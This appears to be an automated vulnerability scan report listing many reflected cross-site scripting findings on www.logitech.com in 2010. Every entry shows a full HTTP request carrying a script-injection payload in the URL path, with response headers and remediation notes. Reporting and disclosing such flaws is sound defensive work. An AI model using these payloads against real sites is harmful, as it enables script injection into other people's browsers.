<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb04"><script>alert(1)</script>d41950667f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /fdb04"><script>alert(1)</script>d41950667f8/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83630</script><script>alert(1)</script>a851f09719d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /83630</script><script>alert(1)</script>a851f09719d/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51c5"><script>alert(1)</script>5b4ca44b54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /b51c5"><script>alert(1)</script>5b4ca44b54/addthis/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb2fe</script><script>alert(1)</script>cc64f73111b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fb2fe</script><script>alert(1)</script>cc64f73111b/addthis/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea07"><script>alert(1)</script>6c56ef70668 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /8ea07"><script>alert(1)</script>6c56ef70668/flags/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f0ac</script><script>alert(1)</script>083772d2a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1f0ac</script><script>alert(1)</script>083772d2a3/flags/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f13</script><script>alert(1)</script>6166506d390 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b1f13</script><script>alert(1)</script>6166506d390/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e47b2"><script>alert(1)</script>5d5f7e9f620 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /e47b2"><script>alert(1)</script>5d5f7e9f620/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb296"><script>alert(1)</script>9b69077ece5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /eb296"><script>alert(1)</script>9b69077ece5/v2/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94373</script><script>alert(1)</script>06b43d2a255 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /94373</script><script>alert(1)</script>06b43d2a255/v2/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44bb"><script>alert(1)</script>4d5c3b01c5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /e44bb"><script>alert(1)</script>4d5c3b01c5c/v2/cmn/form-elements/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16108</script><script>alert(1)</script>a1c19ff7f72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /16108</script><script>alert(1)</script>a1c19ff7f72/v2/cmn/form-elements/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4fdb"><script>alert(1)</script>0fd13b8bc41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /d4fdb"><script>alert(1)</script>0fd13b8bc41/v2/cmn/links/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d142f</script><script>alert(1)</script>5735a02d0ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d142f</script><script>alert(1)</script>5735a02d0ff/v2/cmn/links/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b413"><script>alert(1)</script>364256a4b7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /9b413"><script>alert(1)</script>364256a4b7c/v2/cmn/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6813d</script><script>alert(1)</script>8a0b02fce89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /6813d</script><script>alert(1)</script>8a0b02fce89/v2/cmn/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33425</script><script>alert(1)</script>1cf7202933 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /33425</script><script>alert(1)</script>1cf7202933/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 101af"><script>alert(1)</script>aba5ea32a05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /101af"><script>alert(1)</script>aba5ea32a05/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35ee0</script><script>alert(1)</script>a6293e59792 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /35ee0</script><script>alert(1)</script>a6293e59792/v2/cmn/promo/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28f75"><script>alert(1)</script>aa38c85bc44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /28f75"><script>alert(1)</script>aa38c85bc44/v2/cmn/promo/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3bf5</script><script>alert(1)</script>0c30a287b90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e3bf5</script><script>alert(1)</script>0c30a287b90/v2/fonts/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5406"><script>alert(1)</script>d93d5dd2385 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /b5406"><script>alert(1)</script>d93d5dd2385/v2/fonts/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9405b</script><script>alert(1)</script>5dcc0636aa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /9405b</script><script>alert(1)</script>5dcc0636aa6/v2/homepage/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c4c"><script>alert(1)</script>a53feffd41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /41c4c"><script>alert(1)</script>a53feffd41/v2/homepage/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24908"><script>alert(1)</script>e644b6ce53f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /24908"><script>alert(1)</script>e644b6ce53f/v2/temp/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6199b</script><script>alert(1)</script>5f89940f375 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
